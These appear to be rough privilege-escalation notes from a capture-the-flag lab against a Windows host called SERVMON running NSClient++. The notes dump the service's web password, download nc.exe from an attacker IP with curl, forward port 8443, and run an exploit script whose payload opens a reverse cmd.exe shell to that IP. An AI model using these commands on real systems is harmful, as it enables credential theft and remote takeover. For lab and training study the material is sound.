Priv Esc

cd C:\Program Files\NSClient++
nscp web -- password --display
ew2x6SsGTxjRwXOT
nadine@SERVMON C:\>mkdir temp
A subdirectory or file temp already exists.

nadine@SERVMON C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is 20C1-47A1

 Directory of C:\

02/28/2022  07:02 PM    <DIR>          inetpub
09/15/2018  12:19 AM    <DIR>          PerfLogs
02/28/2022  07:55 PM    <DIR>          Program Files
02/28/2022  07:07 PM    <DIR>          Program Files (x86)
02/28/2022  08:02 PM    <DIR>          RecData
02/28/2022  07:35 PM    <DIR>          Shared
05/27/2024  03:26 AM    <DIR>          temp
02/28/2022  08:04 PM    <DIR>          Users
02/28/2022  07:02 PM    <DIR>          Windows
               0 File(s)              0 bytes
               9 Dir(s)   6,115,024,896 bytes free

nadine@SERVMON C:\>cd temp

nadine@SERVMON C:\temp>curl http://10.10.14.3/nc.exe -O nc.exe
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 66048  100 66048    0     0  66048      0  0:00:01 --:--:--  0:00:01  295k
curl: (6) Could not resolve host: nc.exe

nadine@SERVMON C:\temp>
type nsclient.ini
~C
-L 8443:127.0.0.1:8443
python3 exploit.py "C:\\temp\\nc.exe 10.10.14.3 1337 -e cmd.exe" https://localhost:8443 ew2x6SsGTxjRwXOT
